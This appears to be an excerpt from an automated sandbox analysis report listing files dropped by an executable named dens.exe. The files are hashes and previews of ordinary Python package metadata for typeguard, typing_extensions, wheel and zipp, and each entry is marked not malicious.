                                                                                                                                                                                                                                            SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                                            SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                                            SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3717
                                                                                                                                                                                                                                            Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                                            MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                                            SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                                            SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                                            SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2402
                                                                                                                                                                                                                                            Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                                            MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                                            SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                                            SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                                            SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):48
                                                                                                                                                                                                                                            Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                                            MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                                            SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                                            SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                                            SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10
                                                                                                                                                                                                                                            Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:LEJn:M
                                                                                                                                                                                                                                            MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                                            SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                                            SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                                            SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:typeguard.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13936
                                                                                                                                                                                                                                            Entropy (8bit):5.135214154002924
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:A. HISTORY OF THE SOFTWARE.==========================..Python was created in the early 1990s by Guido van Rossum at Stichting.Mathematisch Centrum (CWI, see https://www.cwi.nl) in the Netherlands.as a successor of a language called ABC. Guido remains Python's.principal author, although it includes many contributions from others...In 1995, Guido continued his work on Python at the Corporation for.National Research Initiatives (CNRI, see https://www.cnri.reston.va.us).in Reston, Virginia where he released several versions of the.software...In May 2000, Guido and the Python core development team moved to.BeOpen.com to form the BeOpen PythonLabs team. In October of the same.year, the PythonLabs team moved to Digital Creations, which became.Zope Corporation. In 2001, the Python Software Foundation (PSF, see.https://www.python.org/psf/) was formed, a non-profit organization.created specifically to own Python-related Intellectual Property..Zope Corporation was a sponsoring member of the PS
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3018
                                                                                                                                                                                                                                            Entropy (8bit):5.0579916471633
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: typing_extensions.Version: 4.12.2.Summary: Backported and Experimental Type Hints for Python 3.8+.Keywords: annotations,backport,checker,checking,function,hinting,hints,type,typechecking,typehinting,typehints,typing.Author-email: "Guido van Rossum, Jukka Lehtosalo, .ukasz Langa, Michael Lee" <levkivskyi@gmail.com>.Requires-Python: >=3.8.Description-Content-Type: text/markdown.Classifier: Development Status :: 5 - Production/Stable.Classifier: Environment :: Console.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Python Software Foundation License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Langua
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):571
                                                                                                                                                                                                                                            Entropy (8bit):5.751670348693122
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:__pycache__/typing_extensions.cpython-312.pyc,,..typing_extensions-4.12.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typing_extensions-4.12.2.dist-info/LICENSE,sha256=Oy-B_iHRgcSZxZolbI4ZaEVdZonSaaqFNzv7avQdo78,13936..typing_extensions-4.12.2.dist-info/METADATA,sha256=BeUQIa8cnYbrjWx-N8TOznM9UGW5Gm2DicVpDtRA8W0,3018..typing_extensions-4.12.2.dist-info/RECORD,,..typing_extensions-4.12.2.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..typing_extensions.py,sha256=gwekpyG9DVG3lxWKX4ni8u7nk3We5slG98mA9F3DJQw,134451..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1107
                                                                                                                                                                                                                                            Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2153
                                                                                                                                                                                                                                            Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4557
                                                                                                                                                                                                                                            Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                            SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                            SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):104
                                                                                                                                                                                                                                            Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                                            MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                                            SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                                            SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                                            SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3575
                                                                                                                                                                                                                                            Entropy (8bit):5.085545958857746
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:D0h4aC/S802Vpnu3pyt1Q+/+DeVb0ksYSwTgD:Oc/z02Vpnu3pytS+2DeVNfSwTW
                                                                                                                                                                                                                                            MD5:F659E7F578CE6FD3753871DBBBA1F939
                                                                                                                                                                                                                                            SHA1:C53B0E6A2E3D94093E2FE4978926A7439B47D43C
                                                                                                                                                                                                                                            SHA-256:508AE4FE43081C64B0B0A2828588B3A8CC3430C6693D1676662569400B0DFDB1
                                                                                                                                                                                                                                            SHA-512:2C0496B76D259259A8F1E57F3ED2224A7E3E99FF309F764C00A8377BB5BD1C94035BDDF24BD1BA637209677CB9F4E8109F84C50B3488B5B8FC372B6BEDAB9AE0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: zipp.Version: 3.19.2.Summary: Backport of pathlib-compatible object wrapper for zip files.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/zipp.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: test.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'test'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'test'.Requir
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1039
                                                                                                                                                                                                                                            Entropy (8bit):5.8094923667268965
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:An/2zDlvbqfuiwbWk/EsJ6Xam9lpW8OWq3tW36nJA3u3iWwksYW:AnuXlzUuitk/5J6f9lpW8OW4tM6nJSkE
                                                                                                                                                                                                                                            MD5:1E77310EF3277C93430D969FEAC8FDFC
                                                                                                                                                                                                                                            SHA1:173240337F249E2A6D54206AA0D0ACB0FDED12D7
                                                                                                                                                                                                                                            SHA-256:F316F2E03FD9ADE7EBBC0B154706848E2BB8FD568B90935109F0D8E3CE2B9BFE
                                                                                                                                                                                                                                            SHA-512:68F752DAF2DBEB79644337E4DB9B8CEAEAE3606A865EDC32BE16785DC97BDCF38EF200F0EDC86DC9D71ABA72E108D2851A510F0EB598FFEA286503F0C9772E5E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:zipp-3.19.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..zipp-3.19.2.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..zipp-3.19.2.dist-info/METADATA,sha256=UIrk_kMIHGSwsKKChYizqMw0MMZpPRZ2ZiVpQAsN_bE,3575..zipp-3.19.2.dist-info/RECORD,,..zipp-3.19.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp-3.19.2.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..zipp-3.19.2.dist-info/top_level.txt,sha256=iAbdoSHfaGqBfVb2XuR9JqSQHCoOsOtG6y9C_LSpqFw,5..zipp/__init__.py,sha256=QuI1g00G4fRAcGt-HqbV0oWIkmSgedCGGYsHHYzNa8A,13412..zipp/__pycache__/__init__.cpython-312.pyc,,..zipp/__pycache__/glob.cpython-312.pyc,,..zipp/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..zipp/compat/__pycache__/__init__.cpython-312.pyc,,..zipp/compat/__pycache__/py310.cpython-312.pyc,,..zipp/compat/py310.py,sha256=eZpkW0zRtunkhEh8jjX3gCGe22emoKCBJw72Zt4RkhA,219..zipp/glob.py,sha256=etWpnfEoRyf
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
